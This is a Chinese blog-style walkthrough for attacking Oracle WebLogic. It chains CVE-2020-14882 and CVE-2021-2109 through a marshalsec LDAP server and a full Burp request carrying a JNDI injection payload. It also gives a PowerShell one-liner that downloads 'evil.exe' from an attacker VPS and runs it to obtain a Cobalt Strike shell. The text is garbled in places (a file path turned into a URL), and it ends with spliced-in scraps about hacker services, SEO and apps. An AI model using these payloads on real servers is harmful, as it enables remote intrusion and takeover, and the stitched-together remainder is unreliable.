参考:
https://blog.csdn.net/zhlh_xt/article/details/76436807
下载链接:
https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html
开始安装:
| Java -D64 -jar wls1036_generic.jar |
| C:\Oracle\Middleware?projects\domains |
设置密码
搭建完毕
访问目标:
准备工作:
ldap包下载 https://github.com/RandomRobbieBF/marshalsec-jar/archive/master.zip
构造java包进行编译:Request.java
如想上线CS把calc.exe修改为下载cs木马并执行命令
cd https://www.freebuf.com/Windows/Temp && powershell (new-object System.Net.WebClient).DownloadFile('http://vps/123.jpg','evil.exe') & evil.exe
进行编译:注意目标环境是什么jdk就用什么jdk版本进行编译
编译好class包后上传到vps
开启http服务,下面放编译好的class包
用下载好的marshalsec包开启ldap服务:
通过burp请求:配合
CVE-2021-2109(ldap远程代码执行)和CVE-2020-14882(未授权访问)
完整数据包:
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22;ldap://vps:5005/Request;AdminServer%22) |
cs接收shell
限制条件:目标可以出网,能够成功构造和发送包
一、多样化的进犯投进办法Web skimmer,也被称之为Magecart进犯,它被评为了2018年最风险的安全要挟,而且这种要挟并不会在2019年消失。 研究人员以为,2019年还将呈现新式的Web...
黑客咨询联系相关问题 济南黑客cracer相关问题 黑客记忆装甲怎么获得 我想查别人身份证号码(身份证号码查个人信息)...
做SEO都需要去做外链,不管是单向的链接还是友情链接,那么我们在做外链的时候要注意什么? 从原创度讲,外链所发布的地方最好是以质量高的软文投稿这种形式去发布,而不是大家一窝蜂的在A5等论坛上去发垃圾...
每个人的境遇不一样,家庭条件也不一样,人生低谷并不可怕,怕的是你从此就倒下,人生总要经历一些大起大落,才能真正的成长,不管什么时候我们都要对生活。 攻击网站有什么用。钱又不在网站上你出口气,钱又捞不回...
刷宝真的能赚钱吗(累死累活月赚十块的刷宝 )沉寂许久的陈欧,这次又杀回来了! 最近,一款叫做“刷宝”的APP在应用商店爆火,在苹果应用商店的免费总榜中,排名在第3、第4位,并曾一度冲到第2位。、...
版本并没有遇到失败的情况2019年06月15日,360CERT监测到在野的Oracle Weblogic远程反序列化命令执行漏洞,该漏洞绕过了最新的Weblogic补丁(CVE-2019-2725),...